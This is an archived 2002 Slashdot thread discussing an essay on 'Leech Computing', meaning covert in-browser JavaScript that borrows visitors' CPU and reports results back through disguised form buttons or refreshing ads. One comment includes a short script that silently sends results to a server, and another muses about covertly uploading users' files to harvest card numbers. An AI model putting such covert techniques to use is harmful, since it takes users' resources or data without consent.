Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
×
The Internet

The Theory of Leech Computing 242

Phil Frisbie, Jr. writes "I am defining Leech Computing as 'a program running on a client computer without user knowledge that can process data and report back the results, but otherwise does not effect the usability of the client computer and makes no changes to the client'. Leech Computing, Part 1 covers basic theory."
This discussion has been archived. No new comments can be posted.

The Theory of Leech Computing

Comments Filter:
  • Good news boy! I found an electronics store that carries leeches. Well, actually, it was more of a bait shop...
    • Well, actually, it was more of a bait shop...

      "But back then, instead of calling them bait shops, we called them wet bug parlors. Give me 10 dozen nippers for a nickel, we would say..."
  • Leech Computing, Part 1
    Where have you been leeched today?

    ---

    By Phil Frisbie, Jr.

    Disclaimer

    This article is for personal enlightenment only. It is not a warning of any known current practices or a proposal of future acceptable practices. However, this is a REAL technology, as you shall see for yourself....

    Part 1 of this article contains no real technical details. It is written to enlighten the average web user. Actual working examples with source code will be included in part 2.

    Background

    I am defining Leech Computing as 'a program running on a client computer without user knowledge that can process data and report back the results, but otherwise does not effect the usability of the client computer and makes no changes to the client'. This leech program runs only in memory, and does not access the client's hard drive at all. Real leeches typically attach themselves to animals that spend time in the water. When the leech is hungry, it attaches itself to an animal where it either remains until full or is knocked off. If knocked off, it simply finds another animal to attach to. When the leech is full, it drops off leaving the animal unharmed. The leech needs the animals, so it chooses large animals and only takes a little blood at a time without harming them.

    Leech Computing is related to distributed computing. Distributed computing projects such as SETI at Home and distributed.net have hundreds of thousands volunteers that have downloaded and installed client software that runs in the background or as a screen saver. Data files are copied between the hard drive of the client and an Internet server in order to retrieve data to process and send back the results. Work is broken up into small units that can take anywhere from a few minutes to many days to complete before the results are sent back. These hundreds of thousands of clients act as one huge computer, which can accomplish much work at a very low cost, since the clients 'donate' their computing time to the project.

    Another technology you may have heard about is Parasitic Computing. Parasitic Computing can use any computer connected to the Internet to process a tiny amount of data. While the idea is intriguing, it is not practical because the computing power needed just to send and receive the data packet is thousands of times more than just processing it yourself. I mention this because Leech Computing and Parasitic Computing share these basic ideas: the user does not know data is being processed, no software is installed, and no system changes are made.

    So how can Leech Computing retrieve data, process it, and return the results without the user knowing it? How can it do this without installing any software? How can it be undetectable by firewall software? All it needs to accomplish these seemingly impossible goals is one piece of common software, a web browser.

    The web browser is the most used piece of software today. Millions of users are logged in at any given time of the day browsing web sites, checking email, making purchases, etc. Since the first web site was put online about ten years ago, web pages have gone from plain text pages to the current flashy looking sites we have today. The web browser has evolved to provide the capabilities to support these needs.

    One of the first web browser enhancements was JavaScript and Java applet support. JavaScript and Java applets are programs that run in your browser. While Java applets can potentially cause security problems and are disabled by some users, JavaScript has no serious security problems and so is seldom disabled. JavaScript is also the most widely used tool to enhance web pages because it is easy to use and very versatile. Most any time you see cascading menus, moving text, or forms that warn you when you enter the wrong type of data, you are running JavaScript programs. In fact, you could say that a fancy JavaScript page is leeching some of your computer resources in order to create all those fancy effects.

    But, while web pages currently use JavaScript and other types of programs to process data to display, they generally do not send results back to a server (with the exception of forms the user may fill out and send). From now on when I refer to a leech program, I will be referring to a JavaScript program. Even though other types of programs such as Java applets and ActiveX controls could also be used, they may be disabled by the user, they may need to be approved by the user before they are run, and they do get installed to the users hard drive.

    Simple examples

    This is going to be theory only; no actual working code will be presented here. Again, part two will include actual working examples with source code.

    Getting the data to the user is the simple part; it is simply embedded in the web page. Scrolling messages are a common example. Even though one line at a time might be displayed, all of them are loaded into the page. Or that cascading menu, which has all the submenus loaded ready to display when needed.

    So, current web pages are already using JavaScript programs, and we know that data is being sent and processed to display that cascading menu when you run your mouse over it, but how could you possibly get data back to the server without the user knowing it?

    One way would be to persuade the user to perform the upload of data. Remember, forms can submit data back to a server. We fill out forms and send them regularly. But forms can also have hidden information that the user does not need to fill out. In fact, a form can have ONLY hidden information; all it needs is a button for the user to click. Of course, you would not label such a button 'Click here to submit hidden data', but what if it were labeled 'Next Page'? How many times have you pressed a button like that without even thinking about it? When the user presses the button, the leech submits the hidden data and redirects to the next page. As long as the user gets to the next page, they will not have any reason to think that the button had any other function.

    Another way would be to use a self-refreshing window. You know, like those annoying pop-up or pop-under advertisements. Or maybe something less conspicuous like a framed advertisement on a web page. When done with the current data, the leech can upload the processed data and get new data along with the new advertisement. Would you even notice, or even wonder about that advertisement refreshing? Of course not, because it is so common.

    Conclusion

    The technology to implement Leech Computing is here, now. Is it being used? I have not found any evidence, but I also do not look at the source code to every web page I download. Maybe I should.

    Can it be prevented? That is the best/worst part, depending on your point of view. Since a leech can simply be a JavaScript program, nothing short of disabling JavaScript can stop it. And if you do, you will greatly reduce your web browsing experience, and will even be locked out of many sites that require JavaScript to be enabled.

    Part 2 will be posted soon.

    Phil Frisbie, Jr.

    ---

    Page last modified: Tuesday February 19 2002
    © 1998-2001 Hawk Software
  • by PowerTroll 5000 ( 524563 ) on Tuesday February 19, 2002 @04:02PM (#3033725)
    Spyware [spychecker.com] seems to fit this definition as a less-appreciated form of leech computing.
    • by bananapeel17 ( 311593 ) on Tuesday February 19, 2002 @04:17PM (#3033843) Homepage
      I recently ran Ad-Aware [cnet.com] on my windows box and was surprised to find there were 4 spyware programs installed and running, and remnants of 3 more existed in the registry. And I thought I was being careful...
    • Or for the more lazy... You can download Adaware from their main site here [lavasoftusa.com] (but it's temporarily down) or get it from cnet.com here [cnet.com]. This will scrub your computer of spyware you have now on it. I would periodically use it as well.

      While browsing I would probably use a blocker in addition to your firewall. Maybe something like Spyblocker which will block malicious bugs, cookies, ads, spyware, and worms. This can be downloaded here [bellsouth.net].

      That should keep your computer covered.
  • Slashdotted (Score:4, Funny)

    by selkirk ( 175431 ) on Tuesday February 19, 2002 @04:03PM (#3033731) Homepage
    Step #1: Leech off of someone with lots of bandwidth.
    • Step #2: Congratulations, you have found Slashdot. Now present a theory and have the /. users write down the practical ideas which will be "Leech Computing, Part 2".
      • Re:Slashdotted (Score:2, Informative)

        by PhilFrisbie ( 560134 )
        I don't need /. readers to write part 2 for me....I am already working on the CGI program and JavaScript for the demos.
        • It appears that you need ./ readers to tell you to scrap the red font on a black background. I usualy don't flame people but come on even porn sites gave that up in the 1980's. when part 2 comes out, i'll store the page and edit out your color's and view localy
  • by 2nd Post! ( 213333 ) <gundbear@pacbe l l .net> on Tuesday February 19, 2002 @04:03PM (#3033739) Homepage
    I can almost imagine someone writing a server side dynamic javascript generator on Slashdot in order to disseminate SETI data to web browsers to crunch (albeit very tenuously) to be uploaded again whenever someone hits 'submit' :)
  • that can process data and report back the results

    Sure, passwords, logins, mails, other confidential data, or perhaps your son's pr0n collection ... it the only report the results (filenames etc.?)
    This reminds me of some popular trojans for windows (SUB7BONB)!
    • I recently saw a page using Javascript that was able to upload files from the users HD to the server that did not have any sort of security warnings on it or any warning dialogs pop-up in IE5.

      It had a button marked browse that the user used to select which file was to be uploaded and then the user hit submit so that the file was sent, but, uh, is there really that much keeping the other system from selecting a file 'for the user'?

      Heck just defaulting to all files under 100k in a the default document save location of Excel would be enough to get at least a few credit card or even social security numbers.
  • Well.. (Score:4, Funny)

    by ch-chuck ( 9622 ) on Tuesday February 19, 2002 @04:05PM (#3033753) Homepage
    what else is Mr & Mrs home users new 2.4Ghz, 510Mb, 120Gb system running XP just purchased to send an AOLgram to missy at college once every weekend, good for?

    • Someone should sign them up for distributed.net :)
  • A professor in our department hired a research assistant a while ago, who worked for him for about a year. After the assistant left, the professor noticed that his computer was running really sluggish at all hours, but b/c he wasn't really familiar with the system, assumed it was just getting slower with all the data processing algorithms he was running.

    A couple of months later, the network admin starts nosing around, and sends the professor an embarassing note asking to take down the web server about hot leather pants from his computer, since it was overloading the network...
  • Nice idea as long as your clients know what they've got on them and are willing to monitor the leech's connections 24/7 to make sure no one's retrofit them with a malicious payload, which is to say they aren't, which is to say I'm about as gung-ho to see these out in the wild as I am Magic Lantern.
  • Idea (Score:4, Insightful)

    by autocracy ( 192714 ) <slashdot2007@sto ... .com minus berry> on Tuesday February 19, 2002 @04:07PM (#3033769) Homepage
    Can we use this to create a distributed webserver that where each person who visits the site will serve copies of it? This guy's system can definitely use it! SLASHDOTTED
  • by werd life ( 94886 ) on Tuesday February 19, 2002 @04:11PM (#3033793)
    Parasitic computing is getting other machines to perform calculations for you, while only using legitimate services. There is a great article here [sciencenews.org]

    There's also a good page quickly discussing Villain-to-Victim [uni-erlangen.de] computing. The point is to use correctly configured machines to do things they were not intended to.

    • His article says:
      Another technology you may have heard about is Parasitic Computing. Parasitic Computing can use any computer connected to the Internet to process a tiny amount of data. While the idea is intriguing, it is not practical because the computing power needed just to send and receive the data packet is thousands of times more than just processing it yourself. I mention this because Leech Computing and Parasitic Computing share these basic ideas: the user does not know data is being processed, no software is installed, and no system changes are made.

      Please try to read the article before you go making redundant peanut gallery comments. The link you provided is helpful, though.
  • We (students) once turned one of the computer rooms into a mosix cluster
    although us users knew (unlike this leeching) it was to the same effect, processes would migrate and spread the work load

    once mosix get pthreads support (they han't last time i checked, i duno know, they were working on it) i think mosix would be a good thing to install even in offices. your work station being part of a cluster would make it last longer (ie in time b4 it too slow to use, and u upgrade all the office pcs)
  • Interesting concept (Score:4, Interesting)

    by GreyPoopon ( 411036 ) <gpoopon@gmaOOOil.com minus threevowels> on Tuesday February 19, 2002 @04:13PM (#3033809)
    Conceptually, I find this interesting. It can run without user notice. The only problem is that it does steal CPU cycles, and as far as I know there is no real way in Javascript (or Java applets) to make the program run only when it isn't competing with other applications. I can imagine that some users might get really upset because you are stealing their computer resources. Because of this, I wouldn't recommend doing this kind of thing without notifying the user and perhaps giving them the option to turn it off. However, I can see some potential uses for this as long as the user is aware. For example, slashdot viewers probably wouldn't mind some leech Javascript working on the latest encryption cracking contest, especially if they got to "share the wealth."
    • So how much are you going to pay me for leeching my CPU time? The only reward I want is cold, hard cash.
    • I can't remember if it was in Hacker Crackdown or The Cuckoo's Egg, where they talked about how one of the hackers was busted for illegal use of electricity. By running processes on the remote machine he was running up their electrical bill just a little bit more, but it was enough under the law to nail him. I think this case referenced occured in Britain. I'm not sure if it would apply in Canada or the US.
      Damn it's been so long since I read those books. Anyway, if you catch someone leeching, the option to prosecute should be there, because they ARE stealing from you in one form or another when using your computer without permission.
    • as far as I know there is no real way in Javascript (or Java applets) to make the program run only when it isn't competing with other applications.

      Java can do it easily. Something like (warning-untested code):

      Thread t=new Thread(this);
      t.setPriority(Thread.MIN_PRIORITY);
      t.start();

      If applet class implements Runnable, the above code will start a thread with minimum priority, so it will nice itself downwards. If I recall correctly, even secure systems allow you to renice yourself *downwards*. I used to even be able to get IE to let me run at max priority!

      So to summarize - yes, it can be done, and rather easily at that.
  • Mipsucking recycled (Score:3, Interesting)

    by kiick ( 102190 ) on Tuesday February 19, 2002 @04:17PM (#3033835)
    Wired had an article [lycos.com] about this way back in '97.
    They called it mipsucking. The idea was to skim off CPU cycles when someone visited a web site. They even had a sample java-script app.
    • I don't see how this would be a better use of computing resources than just using your own servers to do the work. What the author of Leech Computing should have done is break the problem down to its measurable elements.

      Here is some of what would have to be considered:

      1. Length of time the average user will be viewing a page or ad (the computing benefit realized)
      2. Computing cost of serving this page up to the user
      3. Computing cost of collecting and organizing the data from leeched / mipsucked users
      4. Monetary cost of either building an interesting site to attract "hosts" or riding an advertisement or other element of someone else's interesting site

      I would say that focusing on maximizing your own server resources would be a far simpler way to get your computing task done. As a "free" alternative to this, the voluntary donation of computing resources (as in the SETI project) answers concern #1 and #4 far better than leeching.
  • by Bonker ( 243350 ) on Tuesday February 19, 2002 @04:17PM (#3033842)
    Say you're running a 1.5 ghz machine and browsing the web. Chances are, even if you're playing MP3's in the background, you're using less than 5% of your processor cycles. If you could trade another 50% of those cycles you're not otherwise using for the ability to kill ads or for access to a restricted site, Would you?

    (I can see it now. 50 to 100 years from now, the Porn Website Coalition has won a Nobel prize for creating a vast distributed network for math intensive problems....)

    The problem with this model is that the implimentation of Javascript is slow and horrendously messy. It's brutally inefficient for anything other than the most minor effects carried out in a browser window. I shudder to think of what most browsers would do, given a math-intensive task. FFT's in Javascript anyone?

    Unlike the author, I think that Java and/or ActiveX applets will probably see this sort of exploitation first, since they're easier to tune speed out of.
    • yep, absolutely right - if I'm browsing Slashdot on my G4 450dp with iTunes running, I can run dnetc from the terminal at 7.5Mkeys without any noticeable performance hit (if I use Omniweb at least, other browsers don't seem to be as threaded and get all choked up on me). Just proves how much excess power modern computers have - 8Mkeys when running by itself, 7.5 Mkeys when running with Omniweb and iTunes.
    • The other problem is there is no money in distributed computing.

      No one really has come up with a math-intensive problem that distributes well, that also can make money.
    • I'm sure, I'm remebering correctly that JUNO, a free, ad sponsored ISP; was either going to, or had anounced their intention to have their user's either migrate to a paid plan, or run some kind of drug analylsis program on their machines. I think their EULA even had a line that required that end user's machines run 24/7, but they were not planning to actualy enforce that clause.
      From what I've seen in the field, joe aveage windows user realy doesn't multi-task anyways so there are lots of idle CPU cycles connected to the internet. I've processed 89 work units for SetiAtHome on my machine.
  • by RussRoss ( 74155 ) on Tuesday February 19, 2002 @04:18PM (#3033859) Homepage
    At least on Linux systems, the scheduler behavior is definately affected by even a single low priority (nice value 19) task. I run distributed.net clients full time on my system and generally it's not a problem, but sometimes when running another CPU bound interactive job (playing back movies or MP3s, playing games on an emulator, games in general) the effects are noticeable.

    When I was an undergrad I did a semester research project on this and identified some of the problems:

    http://www.russross.com/cs261/paper.html [russross.com]

    I run a dual CPU machine now which generally masks the problem, but even the fastest single CPU systems will suffer noticeable effects once the scheduler falls back to a round robin scheme with weighted timeslice lengths which is essentially what happens once you have two or more CPU bound jobs competing for CPU time.

    - Russ

    • I've been running with the -mjc patch for awhile now... the other day I decided to see what would happen to my mp3 playback if I tried to drive up my load average. make -j on the linux kernel pushed my average up to about 180 before freeamp skipped, then I ran out of filehandles and the make began to die. Incedently, I met with the OOM killer when I tried make -j 200. It didn't run out of filehandles that time, but the average got up to about 150 and then xterms started disappearing. freeamp didn't skip, but it got wedged trying to load the next file on the playlist, and was killed a few seconds later, along with the make.

      This is a single processor duron 800 with 512mb, so I was impressed to say the least.
    • Hasn't it always seemed like tomorrow's CPUs were going to deliver so much performance you could share the excess capacity? Except that the OS/Apps of tomorrow always seem to grow to suck up that CPU so there's never any extra to hand out.
  • This is going to sound like a me too post, but I'd actually considered writing something like this in perl but been hampered by the fact that I don't own a computer...

    Consider though:

    • Use a server running apache to create little tasks and accept requests by sending out XML packets as replies.
    • A languauge that can upgrade itself on the fly (I need *this* version library, go fetch..)
    Home parallel processing .... wish I had hardware so I could code it.. (redunancy/relocation/poor - should end soon though....)
  • by Arethan ( 223197 ) on Tuesday February 19, 2002 @04:21PM (#3033877) Journal
    A more effective solution would be to have operating systems ship with distributed computing clients pre-installed. That way, if it's ever on the net, it'll be able to do work.

    The current implementation of Leech Computer requires the user to be surfing around with a web browser. My solution would be on every OEM pc sold. Seems like a more useful setup to me.

    Yes, there are security implications, but only as much as having any self upgrading piece of software running in the background. (Besides, I never said Microsoft was the company I'd pick to make the software. ;) Besides, even if it did get hacked, you could have it runnig in a sandbox so that the system's integrity would never be jeopardized.

    The people buying computers these days are pretty clueless. I've seen people buy computers without having even used one before. Just because it's the 'in' thing. We might as well put all that wasted processing power to good use!
  • I believe we have discovered the first really innovative use for Java. Think about it, web delivered, platform agnostic (it's supposed to be) and quiet. a simple java app that loads, perform's it's job, send the results back and dies.

  • Slight Surprise (Score:5, Interesting)

    by rgmoore ( 133276 ) <glandauer@charter.net> on Tuesday February 19, 2002 @04:26PM (#3033903) Homepage

    The one thing that surprised me a bit was that the author didn't take advantage of the opportunity to put a bit of leech computing onto his own web page. He mentions (on the second page) that:

    Of course, you would not label such a button 'Click here to submit hidden data', but what if it were labeled 'Next Page'? How many times have you pressed a button like that without even thinking about it? When the user presses the button, the leech submits the hidden data and redirects to the next page. As long as the user gets to the next page, they will not have any reason to think that the button had any other function.

    Then I remembered that there was, in fact, just such a button on the first page. But when I went back to check, there wasn't actually a Javascript applet there trying to leech a little bit of computing power from me. There wasn't even a cute little message thanking me for checking to see if there was such a Javascript applet. Too bad, he missed a great chance.

    • Re:Slight Surprise (Score:1, Informative)

      by Anonymous Coward
      It wouldn't have to be a button, just about any event on the page can be made to execute a javascript function: page load, page exit, link clicks, entrance/exit of form fields, mouseovers of various sorts...

      The user might never realize the event had occurred.
      • It wouldn't have to be a button, just about any event on the page can be made to execute a javascript function

        If that were the problem, it would be obvious you'd want to do it when the computation was complete. You're already running in the background, just execute one last thing when it's done.

        The problem is that you need to contact the server and the standard way of doing that is to send a page request with form submit data, which usually needs the page to be reloaded at least.

        Of course, there's probably sneaky ways around that, like doing a submit as a background image preload or something. (I don't know, can you directly manipulate sockets in javascript?)
    • Re:Slight Surprise (Score:3, Interesting)

      by edrugtrader ( 442064 )
      http://hotwired.lycos.com/packet/packet/schrage/97 /01/index1a.html

      the guy that wrote this article in 97 has a javascript that calculates pi while you read the article!
  • Leech Computing(TM) is as pervasive as html. Ads (especially distracting ads) are leeching off of my brain power. They attempt to influence my browsing and buying behavior by first getting my attention and then communicating something to me. They are the cost for all of the free stuff I use daily, so I'm not complaining.

    Would you even notice, or even wonder about that advertisement refreshing? Of course not, because it is so common.

    Conclusion

    The technology to implement Leech Computing is here, now. Is it being used? I have not found any evidence, but I also do not look at the source code to every web page I download. Maybe I should.
    • The technology to implement Leech Computing is here, now. Is it being used? I have not found any evidence, but I also do not look at the source code to every web page I download. Maybe I should.


      Yet another example of how knowing more about a problem only requires you to work even harder in the future.

      Ignorance truely is bliss ;)
  • by Anonymous Coward
    How about ghost ships and zombie processes? Wether intentional or accidental the results are the same. But then I'd hope that "the article poster" wasn't looking at this from a winblows or web centric point of view. Sounds like someone looking to kick up there webhits page. MOve along no news here.

    JerryMeander posting w/o an account for 5 years (egads it's been a long time) and will continue doing so (i'm just too lazy to look up my lost password, or recreate my account)
  • Is that in the second page, the author suggests that one way to get the applet to send the data back is to disguise it as a form, even a form with all hidden data, and only a button to click... what if the button just said "next page"? to read the page where the author suggests that, you have to click a button that says "next page". Have we all just been unwitting participants in an experiment to see if the theory works? Or was it just the 3 or 4 /. readers who actually go out and read the articles?
  • I don't really see how this is TOTALLY possible... I see how you can abstract it until it feels like it's working however...

    IE... Ok, you don't want to install the program, since that would be changing the client, so all computers voluntarily run a sandbox... That sandbox runs in System Idle Process, or niced down a ways... Even given THOSE conditions, a would be interrupt would have to change context from that program into its own code (incidentally, it would have to without it, but for the sake of argument), and the processor will be giving off heat when if could be sitting idle...
  • It's easy enough to hide a window in the background, much like a pop-up ad would. This window would auto update to send information back to the server.

    Particularly vicious would be a virus that could harness this power and then redirect en-masse to DOS attack a specific target.

    This concept is every interesting.
  • What I would like to see is a p2p system that has leeching turned on by default. One of the reasons why napster was so successful was because every file a user downloaded was shared regardless of whether they knew it or not. Imagine having a p2p system where the installer would automatically take a percentage of the user's HD space to share files that they don't even download. Instead these files are automatically propagated to high bandwidth peers throughout the network. The files that are mirrored would depend upon their popularity. The only problem with this would be that you probably could not have a completely decentralized network since you need a central server to keep track of downloads in order for the most popular files to be automatically mirrored.

    This automatic mirroring would be an easy way to kill the slashdot effect when it comes to sudden demand increases for specific files on a P2P network (Think Starr Report). Of course, one could argue that with sharing on by default a popular file would have plenty of mirrors without such as system, but it would help in situations where time is critical.

  • Imagine Google, or even Slashdot using this to aleviate some of their huge (well google anyway) computing needs. I certainly wouldn't mind lending a few of my CPU cycles to google if it meant my searches become more accurate.

    "Don't let ego cloud your judgement, but don't let humility cloud who you are." -- Captain Squal
  • Leech computing?
    I thought it was Lich computing, which is much
    more horrifying...
  • Well, it seems that if something is greedy, self-serving, and intrusive, it doesn't neccesarily have to come from government after all!

    It may be even easier to do than I thought at first, but some of the problem for people like me with persistent connections can be alleviated by:

    1. Serious Firewalls (not much good, but could at least make it harder for a targeted attack if the Java Virus steals password data).

    2. Running Java only when neccesary (what a pain).

    3. Monitoring your bandwidth (my Primary Internet router actually has an LED meter of sorts).

    Still, any code brought in by clandestine means, that operates without the user's knowledge or permission, is "malicious code," and perpetrators should be considered dorks.

    It doesn't matter if the user is using the machine up to what you consider it's potential, It's Not Your Machine!

    I wonder how many of the people who think this idea is "kewl" and think those users won't be hurt spend their spare time railing against "corporate greed." :)

    Oh, well, one more genie out of the bottle.

  • by SirSlud ( 67381 ) on Tuesday February 19, 2002 @04:47PM (#3034024) Homepage
    > how could you possibly get data back to the server without the user knowing it

    He says refresh and 'tricking' the user are the only ways (on form submits.) Wrong.

    dynamic.php:

    <script>
    data data data
    do do
    calc calc
    var me = answer;
    document.write("&ltscript src='http://myserver.com/donate.js?answer=" + encode(me) + "'></scr"+"ipt>");
    &lt\script>

    That sends some data to the client, does some client side cals, and sends the data back to my server (although I have to respect the max limit of data one can send via form posts, but its the same with his more obvious methods.)

    This is done all the time to count impressions in the advertising world. In fact, in a sense, advertising tracking online is already leech computing in some implementations.

    BTW, the .. " as a close of the top level script tag.
  • by Cy Guy ( 56083 ) on Tuesday February 19, 2002 @04:47PM (#3034025) Homepage Journal
    As described in this BBC article, when we talked about leech computing, we meant leech computing [bbc.co.uk].

    As for the definition given in today's write-up, I don't see why it has to be without the users knowledge. As mentioned elsewhere that is 'parasitic computing', and while leeches are parasites, humans for millennia have harnessed all sorts of parasites, including leeches, to perform tasks beneficial to humans. Anyone installing seti@home on their PC is in effect parasitizing their box, but because it is only the spare cycles that are being used, you are none the worse for it, and there is a net benefit. A true non zero [amazon.com] solution.

  • .. in the advertising industry.

    Strictly speaking, many of the impression counting mechanisms that advertisers may rely on can include leech-like implementations (aka, 'beacon' tracking) that are arguably not leech computing only because the tracking mechanism is via img tags more often than script tags. And counting one impression per ad view is hardly utilizing 'computing power', but it doesn't change the fact that there can be more than one request (in paralell off the placement, aka the web page) to ad servers to create a complete impression.
  • In 1988, a guy named Robert Tappan Morris had this crazy idea: take over people's computers but only use their spare cycles to (I believe) solve one hell of a math problem. Guess what happened next...
  • MS Windows.
  • Really, the methods he mentions, my browser already blocks.

    "Tell me when I am about to submit data in a form"

    "Disable (or 'warn me about') active scripting/Javascript/Java/ActiveX"

    Am I the only person that uses these setting as my standard configuration?

    Yes, this doesn't apply to "Joe Home User" but that is a matter of installation defaults, and Microsoft already said they'd switch to "secure by default" settings. (I should have tried harder resisting that dig.)

    But really, Javascript *is* blocked by 'paranoid' security settings in browsers. And so is submitting form data. Though I haven't yet seen anything that tells you *what* data the form is submitting, without having to view source.
  • I am defining Leech Computing as 'a program running on a client computer without user knowledge that can process data and report back the results, but otherwise does not effect the usability of the client computer and makes no changes to the client'. This leech program runs only in memory, and does not access the client's hard drive at all.

    And how is different from a classic [pre-Morris] computer worm? The original idea of a computer worm, after all, was a piece of code that would seek out under-utilized computers and run your code on it without disrupting normal operation. Morris's worm, for that matter, could have acted that way (arguably it was intended to) if it had been better debugged.

    -JS

  • For years, I've been stealing cycles and running programs in the background on the computer belonging to a coworker. She never complains as she 1) runs linux, 2) has a dual 1G PIII with lots of RAM, and 3) can still edit/compile/test with my jobs running.

    Back in '94, her computer also served as our print server....

  • www.filefront.com

    Take a look at the "client" they have you install to obtain games. It uses 'P2P' which is, in their words, a good thing. In reality, it installs a program that sucks up your bandwidth so fast you won't be able to play that Day of Defeat mod you just download from them.

    I know this, because it only took me 2 minutes to find out my roommate had installed it and we immediately had 5 different connections trying to hit his machine. Amazing how quickly that program can bring a DSL connection to its knees.
  • Processes that computed quietly in the background used to be called deamons. The concept of deamons is more general than leeches, but encompasses them.
  • by Spackler ( 223562 ) on Tuesday February 19, 2002 @05:57PM (#3034536) Journal
    but it may sound like one. (it is not MS bashing either)

    I have always wondered if Microsoft has done something like this in their operating systems. If they were sneaky, the "System Idle Process" would be doing a lot more than advertised. It never registers on the CPU counts, even though it is running at 99% of the CPU most of the time. The OS is closed source, so nobody could review it. Just a few ticks here and there, times 50 million. Have the website scoop up data, and distribute the next session (would be missed because you were doing a windows update or checking for the latest security hole fix). Get a nice new registration scheme that gives the PC it's new job codes.
    I'd sure be doing it if I was them and I had that many captive PCs
  • This strikes me as theft, plain and simple, if the folks doing it don't ask for your permission first. What I would want is a utility which detects these intrusions and then sends back fifty megabytes of bogus data over my cable connection...see how long the theft lasts when they continually get slammed with garbage.

    Max
  • This is brilliant.

    Why not create a Java applet that does distributed.net work (or similar), proxied through the web server. Slashdot could have it on its main page (hell, it could be that Slashdot logo in the corner). Some clever person could submit all the work done as his or her own. Sure, running in Java only part-time would limit the amount that would get done, but given the number of computers sitting on Slashdot at any given moment, it could accomplish a lot cumulatively...

    I'm not familiar enough with web Java applet security policies to know how tricky this would be, but it'd be interesting, anyway.

    -Puk
  • I'm going to assume that for now the author goes for something using Javascript:
    #1. Javascript is extremely slow. It's also interpreted, not compiled. Code optimized and compiled for a system can be a hundred times faster.
    #2. Coding anything usuable for this type of application would require a good bit of code to be sent via javascript.
    #3. The amount of processing it would take to:

    A) Generate the web page to send to the user with the appropriate Javacode + whatever the user needs to process
    B) User's computer to interpret the Javascript, execute the code, send back to the main host computer
    C)Host computer recieves the data, decides where to store it, what to do with it etc.

    And for the code to run and NOT affect the user significantly (meaning the processing done wouldn't be very much at all), all in all would likely require far more processing than it would if it were compiled on a server just running by istelf.

    All in all it would be very inefficient, and probably faster for the server managing the data and generating the pages to process this information on its own.

HELP!!!! I'm being held prisoner in /usr/games/lib!

Working...